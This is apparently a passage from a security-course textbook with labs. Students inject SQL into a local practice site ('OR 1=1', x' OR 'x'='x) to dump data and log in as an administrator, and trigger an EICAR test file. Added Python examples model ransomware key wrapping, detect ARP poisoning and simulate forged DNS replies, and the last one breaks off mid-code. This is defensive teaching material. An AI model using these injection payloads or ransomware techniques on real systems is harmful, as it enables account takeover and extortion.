Develetech's storefront website was unfortunately published in a hurry, and not much attention was paid to securing the site. You're especially concerned that the site is vulnerable to injection attacks on its SQL database. An attacker may be able to hijack an account in the database to deface the site or tamper with the product data. So, you'll test the website's vulnerabilities to SQL injection to assess how web-based threats can compromise your organization's security.

1. Import the SQL database.
a) On your Windows Server, double-click the xampp-control icon from the notification area.
Note: You may need to select the Show hidden icons arrow to see the icon. If no icon appears, select the Windows Start button, then select XAMPP→XAMPP Control Panel.
b) In the XAMPP Control Panel, ensure that both Apache and MySQL are running. Both services will have a green background and port numbers listed if they are running. If they aren't running, select the Start button next to each service.
c) Next to MySQL, select Admin.


d) In the phpMyAdmin console, select the Import tab.
e) In the File to import section, select the Browse button.
Note: The name of this button may differ based on web browser.
f) From the data files, open devtech_store.sql.
g) Scroll down to the bottom of the page and select Go.
h) Verify that the import was successful.

2. Review the details of the SQL database.
a) From the navigation pane on the left, select the devtech_store database.
b) Verify that there are three tables in this database: categories, products, and users.
c) Select the categories table and review its data.
This table is a list of the product categories. The id column is the primary key, and the name column lists the name of each product category. There are a total of nine categories.
d) From the navigation pane, select the products table and review the data.
This table is a list of all products. Each product has its own product code, description, price, and whether it is in stock, and corresponds to a category from the categories table.
e) Select the users table and review its data.
This table is a list of users that can sign in to the website. Each user has a user name, password, first name, last name, and permission.

3. Set up the Develetech website and navigate to it.
a) In File Explorer, from the data files, right-click devtech_site.zip and select Extract All.
b) In the Files will be extracted to this folder text box, type C:\xampp\htdocs
c) Select Extract and replace all files when prompted.


d) Open a new web browser tab and navigate to http://localhost:80.
e) Verify that you are on the Develetech Store website.

4. Use a basic injection attack to dump all products in the database.
a) Select the Catalog tab.
b) Verify that all products in the Monitors category are listed in a table.
c) Select some of the other category navigation tabs.
The intended behavior of this page is to list only one product category at a time, depending on which category the user wants to see.
d) Verify that the URL includes the query category=n, where n is the product category id you're currently viewing.
e) Place the insertion point at the end of the URL, and then add a space.
f) Type OR 1=1
g) Press Enter.


h) Verify that the page is saying that it's listing products in the Monitors category, but that it's actually listing every product in every category.
i) In the SQL query section, examine the query that you executed with this injection.
The query selects four columns from the products table where the product category is n or where 1 equals 1. Because 1 equals 1 is always true, the page dumps every category at once.

5. Attempt to sign in to the site without the proper credentials.
a) Select the Sign In tab.
b) Verify that there's a user name and password field on this page, as well as a Sign in button.
c) Attempt to sign in as user kevin with the password Pa22w0rd.
The kevin account is listed in the users table in the SQL database. Kevin has default user permissions.
d) Verify that the sign in attempt failed.
You don't know Kevin's password, and cracking it is impractical.

Students can select and hold the visibility icon in the password field to help them see what they're typing.


6. On the web page, look at the SQL query this attempt executed on the server. How does the form automatically format the user name and password fields in the query?
A: It adds an opening and closing apostrophe for each field, encasing the field in a string literal.

7. Inject a malicious SQL statement into the sign-in form.
a) Type kevin as the user name, and in the password field, type x' OR 'x'='x
As before, you're attempting to exploit an always true condition. Since you're inputting the query in a form, you need to manipulate it with apostrophes. This is because the query will be run with its own opening and closing apostrophes, so you need to ensure the entire statement isn't enclosed in one long string. In other words, the query should be saying: "Use x as the password. Failing that, the password is a true statement."
b) Select Sign in, then verify that you are logged in, but not as Kevin.
The "always true" statement applies to every row of the users table, so it logs you in as the first user in that table. In this case, the first user is Laura Anderson, who has administrator privileges. It's common for the first accounts in a database of users to have administrator privileges.
c) In the SQL query section, verify that the query was formatted insecurely, enabling your injection attack to work.
Your malicious query takes advantage of the default apostrophe formatting and lack of sanitized input.

Consider demonstrating that, other than the apostrophes, the actual characters used in this attack aren't important.

8. What are some other ways an attacker could compromise the database with SQL injection?
A: Answers may vary, but the attacker could drop entire tables, edit individual row entries, dump the contents of the members table to see more user login information, and even log in as specific users.

9. How would you defend against this type of attack?
A: Answers may vary, but one of the most common and useful tactics to deal with SQL injection is the use of parameterized queries, also known as prepared statements. The quotation marks in the sign-in injection, for example, would be interpreted literally if the query were parameterized.

10. Close the browser.


TOPIC C
Assess the Impact of Malware
You've considered how your systems will deal with the threat of system hacking attacks and attacks
that target web apps and websites. Now you'll examine the threat of malicious software, which, if
you're unprepared, can bring swift and devastating harm to your systems.

Malware Categories
Malicious software, or malware, comes in a variety of forms.

Inform students that modern malware often uses combined attack approaches that span multiple categories.

Malware Type: Description

Virus: A piece of code that spreads from one computer to another by attaching itself to other files through a process of replication. Viruses require human intervention to spread. The code in a virus executes when the file it is attached to is opened.

Worm: Like a virus, a worm replicates across the infected system. However, unlike a virus, it does not require human intervention and can replicate itself. Also, it does not attach itself to other programs or files.

Adware: Software that automatically displays or downloads unsolicited advertisements when it is used.

Spyware: Surreptitiously installed malicious software that is intended to track and report the usage of a target system or collect other data the author wishes to obtain.

Trojan horse: Hidden malware that causes damage to a system or gives an attacker a platform for monitoring and/or controlling a system. Trojans typically appear as benign software, but also include malicious code. Unlike viruses, Trojans do not replicate themselves, nor do they attach to other files.

Rootkit: Code that is intended to take full or partial control of a system at the lowest levels. Rootkits often hide themselves from system processes, running invisibly.

Logic bomb: A piece of code that sits dormant on a target computer until it is triggered by a specific event, such as a specific date. Once the code is triggered, the logic bomb detonates, and performs whatever actions it was programmed to do.

Ransomware: Code that restricts the victim's access to their computer or the data on it. The attacker then demands a ransom be paid, usually through a cryptocurrency like Bitcoin that is difficult to trace, under threat of keeping the restriction, destroying the information they have locked down, or exposing the information publicly.

Malvertisement: Malicious code delivered through advertisements, particularly those that are web based, like pop-ups, banners, and front-loaded videos. Because these ads often include dynamic web content like JavaScript, they can easily infect a client's browser even if the ad isn't clicked.


Trojan Techniques
Trojans are insidious and remain undetected much more easily than a typical virus. They are usually propagated by social engineering, such as when a user downloads an email attachment that claims to be benign, but is actually malignant. Even seasoned IT professionals fall victim to Trojan horse deceptions. For example, you might search online for a PowerShell script to help you accomplish some domain user management task. Although it's common to reuse code, unless you trust the source of the script and can actually take the time to evaluate the code itself, you may fall prey to a Trojan—even if the script works as advertised.

Trojans may also be packaged in drive-by downloads, where a user unwittingly downloads the malicious code along with what they think is legitimate software.

Trojans can have many purposes. Some are meant to simply deny service to a user by crashing or locking up their computer, whereas others delete or corrupt data. Other Trojans can log keystrokes and intercept transmissions to steal sensitive data from a user. It's also common for Trojans to contain bots used to turn a computer into part of a larger botnet.

Inform students that botnets will be covered in an upcoming topic.


Figure 4-7: An email message meant to trick a user into downloading a Trojan to their computer.

Virus and Worm Techniques


Attackers inject viruses into a system the same way they insert most other types of malware—through social engineering tactics. A user may believe they're downloading or opening a legitimate application, but they are also executing the virus code when they do so. Depending on how the user's operating system is configured, the attacker may attempt to trick the user into opening a file type that is typically benign (like an image), but if file types are hidden, they are actually opening an executable file.

Viruses can reside in RAM during the duration that the computer is on, or they can infect their targets without moving to memory. Some viruses are able to infect the master boot record (MBR) of an operating system or installation media. More sophisticated viruses do a better job of hiding from users and anti-malware software. Polymorphic viruses, for instance, change their code each time they infect a new file, making it very difficult for anti-malware to keep up. Armored viruses obscure their true location in a system by misleading the anti-malware system into thinking it resides elsewhere. This prevents anti-malware software from accurately detecting and removing the infection. Likewise, armored viruses often contain obfuscated code to make it more difficult for security researchers to properly assess and reverse engineer them.

You may wish to point out that an alternate definition for an armored virus is any virus that is difficult to remove. Some sources refer to viruses that obscure their true location as stealth viruses.

Figure 4-8: A virus changing its code each time it spreads to a new file.


Frequently, viruses are intended to enable further attacks, send data back to the attacker, or even corrupt or destroy data. Because of their replicating nature, viruses are difficult to completely remove from a system, and account for billions of dollars of damage every year.

Whereas viruses tend to interfere with the functions of a specific machine, worms are often intended to interrupt network capabilities. A worm need not carry any sort of malicious payload at all—its primary function is usually just to spread. The act of spreading to enough systems may cripple network bandwidth. Worms that do carry payloads often turn computers into remote zombies (bots) that an attacker can use to launch other attacks from.

Adware and Spyware Techniques


Adware often appears on a user's computer as a browser pop-up. While not all adware is overtly malicious, many adware programs have been associated with spyware and other types of malicious software. Also, it can reduce user productivity by slowing down systems and simply being an annoyance.

Spyware is more problematic, however. The data collected by spyware can include web browsing history, personal information, banking and other financial information, and user names and passwords. This is especially true if the spyware is installed alongside a keylogger. Although it can infect a computer through social engineering tactics, some spyware is included with otherwise legitimate software.

Effective adware and spyware are designed to have little to no effect on performance so they are more difficult to detect. However, victims who are exposed to this type of malware are often infected multiple times, and the effect eventually becomes noticeable. Some types of spyware are able to bypass anti-malware software, as well as disable software firewalls.

Consider mentioning that some spyware is authorized, such as when an organization monitors the computer usage of its employees.

Ransomware Techniques—Vectors and Warnings



Unsurprisingly, social engineering techniques like phishing are the most common vector used to
propagate a ransomware attack. The victim opens a link or attachment that downloads a Trojan
horse onto their device, which contains the ransomware payload. Some ransomware attacks succeed
without social engineering, such as those that enter the network through a flaw in exposed software
or through a remote access service protected by weak credentials. In either case, the payload can
encrypt or lock files directly on the local device, and it can also spread to any network shares that
are mapped on that device, causing significantly more damage to the wider organization.

Lesson 4: Analyzing Attacks on Computing and Network Environments | Topic C



Not all ransomware payloads are the same, though they usually all make themselves known to the
victim by displaying an application window warning the user their files are locked and cannot be
recovered without payment. These warnings are usually eye catching and meant to scare the victim.
They often accuse the victim of doing something embarrassing or illegal, and claim that the victim is
being punished for it (e.g., by law enforcement).


Figure 4-9: An example of what a ransom warning might look like in a ransomware payload.

Ransomware Techniques—Payloads

When it comes to the payload itself, the more rudimentary attacks simply add OS-level restrictions
to the system or files, such as changing file permissions or replacing the Windows shell (the
program Windows launches at logon in place of explorer.exe) with the ransomware's own lock
screen. These are more nuisances than real threats, as an experienced user can get around them,
for example by booting from other media and reverting the change. But inexperienced users often
can't, and therefore decide to pay the ransom. Some payloads even do nothing at all; they just claim
to lock a victim's files, which is enough to scare the victim into payment.

More sophisticated ransomware will affect the system at a lower level, such as rewriting the master
boot record (MBR) or the boot drive's partition table to prevent the operating system from booting.
The ransom itself may then come through a different channel, like an email message that the victim
can read on a different device.


However, the most dangerous form of ransomware actually encrypts the user's files. The process is
as follows:

1. The attacker generates a public–private key pair and adds the public key to the payload. When
the payload executes on the victim's device, it encrypts their files with a symmetric key, which is
then encrypted with the attacker's public key. The private key never leaves the attacker.
2. The symmetric key and the original plaintext data are destroyed, leaving only the encrypted data
and a small piece of asymmetric ciphertext (the encrypted symmetric key). This asymmetric
ciphertext is displayed to the victim in the ransom message.
3. The victim sends this ciphertext, along with payment, to the attacker. The attacker uses their
private key to decrypt the ciphertext, which reveals the symmetric key.
4. The symmetric key is sent back to the victim, who uses it to decrypt their data.

Figure 4-10: The ransomware encryption process.
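The four-step key-handling process above, carried through in Python as an added example (this is not code from the course, nor from any real ransomware family). To stay dependency-free it uses textbook RSA with two small well-known primes and an HMAC-SHA256 counter-mode keystream as stand-ins for the 2048-bit RSA and AES a real payload would use; both stand-ins, the prime values and the sample file contents are assumptions for illustration and are not secure. What the example makes concrete is the responder's view in step 2: after the payload runs, the host holds only ciphertext and the wrapped key, and nothing on it can reproduce the symmetric key without the attacker's private exponent.

```python
"""Hybrid-encryption key handling of crypto-ransomware, steps 1-4.

ADDED EXAMPLE, not course code. The RSA keypair uses two small fixed primes
and the "AES" is an HMAC-SHA256 keystream: both are stand-ins (assumptions)
so the script runs without third-party libraries. They are NOT secure.
"""
import hashlib
import hmac
import secrets

# --- Stand-in public-key scheme: textbook RSA with a toy modulus ----------
P, Q = 999983, 1000003             # assumption: well-known primes around 1e6
N = P * Q                          # about 2^40; a real key is 2048 bits
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))  # private exponent, stays with the attacker
ATTACKER_PUBLIC_KEY = (E, N)       # this is what gets embedded in the payload
ATTACKER_PRIVATE_KEY = (D, N)      # this never touches the victim's machine


def rsa_encrypt(m: int, pub) -> int:
    e, n = pub
    return pow(m, e, n)


def rsa_decrypt(c: int, priv) -> int:
    d, n = priv
    return pow(c, d, n)


# --- Stand-in symmetric cipher: HMAC-SHA256 counter-mode keystream --------
def keystream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """XOR data with a keystream derived from (key, nonce, counter). The same
    call encrypts and decrypts. The per-file nonce matters: reusing one
    keystream for two files would be a two-time pad."""
    out = bytearray()
    for counter, start in enumerate(range(0, len(data), 32)):
        block = hmac.new(key, nonce + counter.to_bytes(4, "big"),
                         hashlib.sha256).digest()
        chunk = data[start:start + 32]
        out += bytes(a ^ b for a, b in zip(chunk, block))
    return bytes(out)


# --- Steps 1 and 2: what runs on the victim's machine ---------------------
def victim_side_encrypt(files: dict, pub) -> dict:
    """Encrypt every file under one fresh symmetric key, wrap that key with
    the attacker's public key, then discard the plaintext key."""
    sym_key_int = secrets.randbelow(pub[1] - 2) + 2   # must be < N for RSA
    sym_key = sym_key_int.to_bytes(8, "big")
    encrypted = {name: keystream_xor(sym_key, name.encode(), data)
                 for name, data in files.items()}
    wrapped_key = rsa_encrypt(sym_key_int, pub)
    del sym_key, sym_key_int       # step 2: only ciphertext + wrapped key remain
    return {"files": encrypted, "ransom_note_blob": wrapped_key}


# --- Step 3: what the attacker does with the blob the victim sends --------
def attacker_side_unwrap(wrapped_key: int, priv) -> bytes:
    return rsa_decrypt(wrapped_key, priv).to_bytes(8, "big")


# --- Step 4: victim decrypts with the key the attacker returned -----------
def victim_side_decrypt(encrypted_files: dict, sym_key: bytes) -> dict:
    return {name: keystream_xor(sym_key, name.encode(), data)
            for name, data in encrypted_files.items()}


def run_demo() -> bool:
    """Constructed sample files; returns True if the full cycle round-trips."""
    originals = {"budget.xlsx": b"Q3 figures: 1,200,000",
                 "notes.txt": b"call the bank on Monday"}
    state = victim_side_encrypt(originals, ATTACKER_PUBLIC_KEY)
    # On the host a responder finds only these two artifacts:
    assert all(state["files"][n] != originals[n] for n in originals)
    assert isinstance(state["ransom_note_blob"], int)
    key = attacker_side_unwrap(state["ransom_note_blob"], ATTACKER_PRIVATE_KEY)
    return victim_side_decrypt(state["files"], key) == originals


if __name__ == "__main__":
    print("round trip ok:", run_demo())
```

The design point worth noticing is that the payload only ever needs the public key, so no amount of memory or disk forensics on the victim recovers the private exponent; what a responder can hope to recover is a copy of the symmetric key if the payload was interrupted before the `del`, which is why memory capture before reboot matters in a live ransomware incident.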

Ransomware Techniques—Payment
The last factor in the ransomware process is payment. The most successful ransomware propagators
follow through on their promise to decrypt the victim's data, as it costs them very little to do so, and
simply taking the money without fulfilling their promise to decrypt would make future victims less
likely to pay. The ransomware propagator will usually request payment in the form of a
cryptocurrency like Bitcoin, but may also allow the victim to pay through pre-paid vouchers or
through wire transfers that go directly to a cash office, eliminating the need for a traceable bank
account.

For victims who refuse to pay, the ransomware propagator usually includes a threat to destroy the
private key if payment is not received in a timely manner, thereby keeping the victim's data
encrypted forever. Again, they may or may not follow through on this threat, though it will help
solidify the attacker's reputation if they do.

Supply Chain Attack



A supply chain attack is an attack that targets the end-to-end process of manufacturing,
distributing, and handling goods and services. The supply chain most often starts with a company
that supplies raw materials to an original equipment manufacturer (OEM). The OEM or another
company then distributes the product, usually as part of a larger product suite. The product is
distributed to a vendor, who in turn sells the product to a customer, ending the chain. For example,
Intel CPUs are built into Asus laptops, so Intel is the OEM of the CPU and Asus is the next link in
the chain.

Example CAPEC IDs: CAPEC-442, CAPEC-444, CAPEC-447, and CAPEC-522.

Because supply chains are so crucial to normal business operations, and affect so many different
companies, an attack on the chain can have a profound ripple effect on organizations and personnel
further down the chain. An attacker can tamper with the devices used at the manufacturing level,
which impacts distribution, which impacts the vendor's ability to sell the product, which ends with
frustrated consumers and lost revenue. Common targets at the manufacturing level include industrial
control systems (ICSs), factory power systems, inventory systems, and any other computer or device
that must remain operational for the supply chain to maintain its forward momentum.
The details of an attack can differ, but most attacks involve physically tampering with devices,
hacking into them and installing malware, or both.




Note: A supply chain attack is a type of out-of-band attack, which implies that attackers use
unconventional, irregular, or indirect means to compromise an organization.

Figure 4-11: A supply chain attack introducing malware at the manufacturer, which has an
increasing effect further down the chain.

Example Supply Chain Attacks

One example of a supply chain attack is Stuxnet, a worm targeting the programmable logic
controllers (PLCs) that drove centrifuges used to enrich nuclear material. The worm was able to
propagate through an infected USB drive physically plugged into a system, which let it reach
networks that were never connected to the Internet. Once it reached a controller further down the
supply chain at the consumer end, the worm altered the controller's logic so that the centrifuges ran
outside their safe operating speeds, damaging them.
In 2013, attackers installed malware on Target's point of sale (POS) systems, enabling them to steal
millions of customers' credit card information. Investigators believe the attackers stole credentials to
Target's network from one of the company's HVAC suppliers. No matter how the attackers stole
the credentials, the fact they were able to compromise a supplier meant the damage was magnified
further down the supply chain.


The 2020 breach of multiple U.S. government agencies was traced to a compromise of SolarWinds, a
company whose Orion network management software is used by many government agencies and
large companies. The attackers inserted a backdoor into the Orion build process, so it shipped inside
a digitally signed product update, and every customer who installed that update was likewise
compromised further down the chain.

Additional Supply Chain Attacks



An organizational supply chain is not just vulnerable to malware-based attacks. For example,
software-based attacks like buffer overflow and command injection against a supplier's design,
build, or configuration systems have also been used against supply chains. Attacks of these types
can modify the design of a product, and, as the product reaches the consumer, it will be different
than what was intended. Depending on the nature of the attack, these design changes may go
completely unnoticed, or they may only be apparent when the product is far enough down the
chain that it cannot be entirely recalled.

Malware Tools

The following are examples of popular tools attackers may use as malware:
• NetBus
• Sub7
• Back Orifice
• Zeus
• FinFisher
• MPack




ACTIVITY 4-3
Assessing the Impact of Malware

Data File

C:\CNX0013Data\Analyzing Attacks on Computing and Network Environments\eicar.txt

Before You Begin
You will activate a text file on your Windows 10 client that is designed to simulate malware, but it
won't harm your system.

Scenario

You are growing concerned about the volume of malware undoubtedly striking Develetech as the
company rapidly grows. Is your anti-malware sufficient to discover these attacks? You need to
identify what the latest threats are and test your end-station anti-malware to ensure that it works
properly.

1. Examine the top malware threats in 2021 according to Sophos, a British cybersecurity firm.
a) Return to your Windows 10 client.
b) Open your web browser and navigate to https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf.

Note: You can also use the search site of your choice to search for sophos 2021 threat report
then select the PDF from the results if you'd rather not type the full URL.


c) In the table of contents, and under THE FUTURE OF RANSOMWARE chapter, select Ransoms rise
as attacks increase.

d) Briefly review the ransomware information presented in this section.

2. According to Sophos, why have average ransom payouts been increasing over the past few
years?

A: Sophos implies that there is a hierarchy (or weight classes, to use their metaphor) to modern
ransomware attacks. Attacks on a few large corporations tend to skew the averages because
these corporations can afford to pay a much larger ransom—and attackers know it. Attacks on
smaller organizations and individuals are less profitable, so those payouts tend to remain
constant.

3. Review common malware delivery mechanisms.


a) Return to the table of contents, and under the EVERYDAY THREATS TO ENTERPRISES –
CANARIES IN THE COAL MINE chapter, select Delivery mechanisms.


b) Briefly review the first malware delivery mechanism listed.




4. According to Sophos, what is the most common delivery mechanism for ransomware, and why?
A: Windows' Remote Desktop Protocol (RDP) is the most common delivery mechanism for
ransomware. Attackers can gain entry into remote computers through RDP just as any user,
enabling them to spread the infection much more easily. RDP has become an even more
prominent vector in the wake of the COVID-19 pandemic as more people work from home and
need to access their computing environments remotely.

5. Review the latest malware predictions.

a) Open a new web browser tab.

b) Navigate to the web search site of your choice and search for malware predictions for <current year
or following year>
c) From the results, select a link that provides some predictions for how malware will evolve and
continue to spread.

6. Share your findings with the class.

What categories of malware do security researchers believe will be prominent? What new
categories of malware might arise? What new or changing delivery mechanisms and attack
vectors might malware take? What other predictions about malware did you discover?
A: Answers will vary greatly depending on the time when the class is taught and what web-based
resources you find. Ransomware will likely continue to be prominent well into the future, especially
attacks targeting the healthcare industry. Malware may take advantage of artificial intelligence (AI)
to better avoid detection and cause more harm. Malware targeting edge devices like those used in
IoT and remote work is also likely to grow in prominence.
7. Test your workstation anti-malware by activating the simulated malware file, eicar.txt.
a) From the course data files, open eicar.txt in Notepad.

b) Verify the file contains what appears to be a random string of characters.


This is the EICAR test file, and it was designed to trigger anti-malware systems without actually
being malicious. When executed as a COM file, it simply prints "EICAR-STANDARD-ANTIVIRUS-TEST-FILE!"
to the console. Many anti-malware vendors have agreed to incorporate this file's signature in
their products for testing purposes.

Note: For more information on EICAR, visit www.eicar.org/?page_id=3950.



c) In the text file, remove the opening bracket at the beginning and the closing bracket at the end of the
string.

The brackets are not part of the actual "malicious" string; they were included to keep the file inert
until now. Removing the brackets reveals the true EICAR test string, which is:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
d) Save the file.
e) Select the Windows notification that pops up, informing you that a threat was detected.

Note: If you missed the notification, select the Notification icon on the right-most part of the
taskbar to see it.

8. View more details about the threat.


a) In Windows Security, under Quarantined threats, select Virus:DOS/EICAR_Test_File.

Note: If Quarantined threats doesn't appear, proceed to the next step.




b) In Windows Security, under Current threats, select Protection history.


c) In the list of items, select Threat quarantined.
d) Review the details of the detected threat.


9. What alert level did Windows Security assign the threat? What category of
malware is this file? What does quarantining a file in Windows Security do?

A: Windows Security assigned this threat an alert level of Severe. The file is a virus, and Windows
Security automatically placed it in a restricted area where it can't affect the rest of the computer.

10. Remove the eicar.txt file.


a) From the Actions drop-down menu, select Remove.
b) Verify that Windows Security indicates the file's status is Removed or restored.

c) Close Windows Security and Notepad.


d) In File Explorer, verify that the eicar.txt file is no longer in the course data files folder.

11. What value does this EICAR test file have in developing and testing anti-malware systems?

A: Answers will vary. Though it is a bit dated, this is one method of ensuring your tool can detect
malware even when it is cloaked (for example, by being inside a ZIP file). You would usually not
want to infect your production systems with live malware, so this operates as a substitute.

12. Close your browser.






TOPIC D
Assess the Impact of Hijacking and
Impersonation Attacks
You've considered how your systems will deal with the threat of malware attacks. Now you will
examine the threat of spoofing, impersonation, and hijacking.

Spoofing, Impersonation, and Hijacking

Spoofing is a software-based attack where the goal is to assume the identity of a user, process,
address, or other unique identifier. An attacker uses spoofing to trick both people and computers
into believing something incorrect about the attacker's actual identity.

Impersonation is a human-based attack where an attacker pretends to be someone they are not. A
common scenario is when the attacker calls a bank customer and pretends to be calling from the
bank's customer service department. The attacker tells the customer they are overhauling and
augmenting their security systems, and they need the customer's online banking credentials to ensure
their account is adequately protected. Impersonation is often successful in situations where identity
cannot be easily established. If the customer in this example doesn't know the real customer service
representative or the customer service number, they may be less inclined to question the request.

Session hijacking involves exploiting a computer during an active session to obtain unauthorized
access to data, services, and networks.
ARP Spoofing

Attackers may be able to spoof network adapter hardware (MAC) addresses and the IP-to-MAC
mappings that other hosts rely on. On a local network this is typically accomplished through the
Address Resolution Protocol (ARP), which translates IP addresses to their corresponding physical
addresses (typically a MAC address). A table of IP addresses with their corresponding MAC
addresses is cached on each network device, and may be updated on the fly. ARP spoofing, or ARP
poisoning, is when an attacker causes an IP address to resolve to a MAC address that was not its
intended destination, usually the attacker's own. Attackers can execute this spoofing attack by
continuously sending unsolicited (gratuitous) ARP replies that carry the erroneous mapping. ARP
has no authentication, and most implementations overwrite a cached record with the latest reply
received, so flooding the cache with spoofed replies makes the attack more likely to succeed and
keeps the poisoned entry in place even after the legitimate host answers.

Figure 4-12: ARP spoofing.

Lesson 4: Analyzing Attacks on Computing and Network Environments | Topic D



Mitigation
There are several ways you can mitigate an ARP poisoning attack, including:
• Make the ARP entries on the relevant hosts static (for example, with arp -s on Windows or
ip neigh add ... nud permanent on Linux) so they cannot be overwritten by ARP replies. This can
be difficult to manage, especially in an environment with many potential targets.
• Create subnets. ARP packets are contained to the local subnet, so an attacker won't be able to
poison the ARP cache of a host on a different subnet. They will, however, still be able to poison
hosts within their own subnet.
• Configure an intrusion detection system (IDS) to scan for anomalous ARP cache changes,
especially changes that map multiple IP addresses to the same MAC address or that change the
MAC address recorded for the default gateway.
• Implement port security to identify and limit the MAC addresses that are allowed access to the
network port.
• Configure DHCP snooping and dynamic ARP inspection (DAI) on switches. DHCP snooping
builds a binding table of the IP addresses assigned through DHCP to MAC addresses and ports,
and DAI drops ARP packets whose sender mapping does not match that table.
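The IDS rule and the static-table check from the list above, written out as an added example (not part of the course materials). The neighbor table it scans is a constructed sample that mirrors what Activity 4-4 step 3 produces after Ettercap poisons the client: the server's IP and the Kali VM's IP both resolving to the Kali MAC. The IP and MAC values, and the known-good baseline, are assumptions. It goes slightly beyond the text in that the parser accepts both Windows `arp -a` output and Linux `ip neigh` output.

```python
"""Detect ARP-poisoning symptoms in a host's neighbor table.

ADDED EXAMPLE, not course code. The sample table below is constructed; it
mirrors what Activity 4-4 step 3 produces after Ettercap poisons the client.
"""
import ipaddress
import re
from collections import defaultdict

# IPv4 address followed (somewhere on the line) by a 6-octet MAC, hyphen or
# colon separated. Matches both 'arp -a' (Windows) and 'ip neigh' (Linux).
ENTRY = re.compile(
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}).*?"
    r"(?P<mac>[0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})")


def parse_neighbor_table(output: str) -> list:
    """Return (ip, mac) pairs with MACs normalized to lowercase colon form."""
    entries = []
    for line in output.splitlines():
        m = ENTRY.search(line)
        if m:
            entries.append((m["ip"], m["mac"].lower().replace("-", ":")))
    return entries


def is_unicast(ip: str, mac: str) -> bool:
    """Skip broadcast/multicast entries, which legitimately share MACs."""
    if ipaddress.ip_address(ip).is_multicast or mac == "ff:ff:ff:ff:ff:ff":
        return False
    return int(mac[:2], 16) & 1 == 0      # I/G bit clear => unicast MAC


def find_shared_macs(entries) -> dict:
    """IDS rule from the text: several IP addresses resolving to one MAC."""
    by_mac = defaultdict(list)
    for ip, mac in entries:
        if is_unicast(ip, mac):
            by_mac[mac].append(ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


def find_baseline_changes(entries, baseline: dict) -> list:
    """Static-table rule: an IP whose MAC differs from the known-good one.
    Returns (ip, expected_mac, observed_mac) triples."""
    norm = {ip: mac.lower().replace("-", ":") for ip, mac in baseline.items()}
    return [(ip, norm[ip], mac) for ip, mac in entries
            if ip in norm and norm[ip] != mac]


# Constructed 'arp -a' output from the poisoned Windows 10 client. The
# addresses and MACs are assumptions for the example.
SAMPLE_ARP_A = """\
Interface: 192.168.56.101 --- 0x5
  Internet Address      Physical Address      Type
  192.168.56.1          0a-00-27-00-00-05     dynamic
  192.168.56.10         08-00-27-3c-6f-12     dynamic
  192.168.56.20         08-00-27-3c-6f-12     dynamic
  192.168.56.255        ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Known-good mapping recorded before the incident (assumption).
BASELINE = {"192.168.56.10": "08-00-27-aa-bb-cc",   # Windows Server 2019
            "192.168.56.1": "0a-00-27-00-00-05"}    # router

if __name__ == "__main__":
    table = parse_neighbor_table(SAMPLE_ARP_A)
    for mac, ips in find_shared_macs(table).items():
        print(f"ALERT: {mac} claims {len(ips)} addresses: {', '.join(ips)}")
    for ip, want, got in find_baseline_changes(table, BASELINE):
        print(f"ALERT: {ip} moved from {want} to {got}")
```

Two caveats when turning this into a real detection: a host with several IP aliases on one interface will legitimately trip the shared-MAC rule, so keep an allow list, and the baseline rule is only as good as the moment the baseline was captured, which is why the text recommends enforcing static entries rather than merely watching them.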

DNS Poisoning

In a DNS poisoning attack, an attacker is able to modify a Domain Name System (DNS) server's
cache so that it returns a fraudulent IP address to its users. Instead of users navigating to the correct
IP address, they are directed to an IP address that serves malware or captures input from the user.
This is effective because the user doesn't necessarily see any overt signs that they've resolved to a
fraudulent address.

Aside from breaking into the DNS server directly and modifying the cache, attackers can exploit
DNS servers that run outdated or otherwise vulnerable software. Whether a forged reply is accepted
depends on the resolver's checks: the reply must arrive on the UDP source port the query left from
and carry the query's 16-bit transaction ID. A resolver that always queries from the same port and
uses predictable transaction IDs leaves the attacker only a small space to guess. The following
process is an example of how vulnerable DNS servers can be poisoned:
1. The attacker repeatedly queries a target DNS server for the address of
random-domain.google.com, varying the subdomain so that each query misses the cache.
2. The target DNS server, not having this subdomain cached, queries authoritative DNS servers to
answer these requests.
3. The authoritative server sends a response with an NS record that refers the google.com domain
to resolution via the legitimate ns1.google.com name server (3a), but the attacker beats this
response by flooding the target with forged replies that guess the transaction ID, each providing
the same NS record for google.com and pointing ns1.google.com to their own malicious name
server's IP address using an A record (3b).
4. The target DNS server caches both the NS and A records.
5. A user queries the target DNS server for docs.google.com (5a), and the target DNS server
queries the malicious DNS server (which the target thinks is ns1.google.com).
6. The malicious DNS server, which was set up to be authoritative for google.com, responds that
docs.google.com is at another IP address controlled by the attacker and which hosts a spoof
site (6a), so the user is directed to the attacker's spoof site where any credentials the user inputs
are captured (6b).






Figure 4-13: A DNS poisoning attack.
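Why the forged reply in step 3b can win the race, shown as an added example (not course code and not a model of any particular resolver). It keeps only the two fields a resolver matches a reply against, the transaction ID and the UDP source port, and compares a resolver that always queries from port 53 with one that randomizes its source port; timing, bailiwick rules and DNSSEC are deliberately left out. The guess counts, the ephemeral port range and the placeholder address 203.0.113.66 in the forged records are assumptions.

```python
"""Why the forged reply in step 3b can win: the resolver's acceptance check
and the guessing space it leaves the attacker.

ADDED EXAMPLE, not course code. Port range and guess counts are assumptions.
"""
import random

TXID_SPACE = 1 << 16          # DNS transaction ID is 16 bits
FIXED_PORT = 53               # an old resolver that always queried from :53
EPHEMERAL = (1024, 65535)     # assumption: randomized source-port range


def make_query(rng, qname, randomize_port):
    """The outbound query the target resolver sends (step 2)."""
    port = rng.randint(*EPHEMERAL) if randomize_port else FIXED_PORT
    return {"qname": qname, "txid": rng.randrange(TXID_SPACE), "port": port}


def response_accepted(query, response):
    """What a resolver checks before caching a reply: it must arrive on the
    port the query left from, echo the transaction ID, and answer the same
    question. Anything else is silently dropped."""
    return (response["port"] == query["port"]
            and response["txid"] == query["txid"]
            and response["qname"] == query["qname"])


def forged_batch(rng, qname, guesses, randomize_port):
    """Step 3b: the attacker floods the resolver with replies that each guess
    a different (txid, port) pair and all carry the poisoned NS/A records."""
    seen = set()
    while len(seen) < guesses:
        port = rng.randint(*EPHEMERAL) if randomize_port else FIXED_PORT
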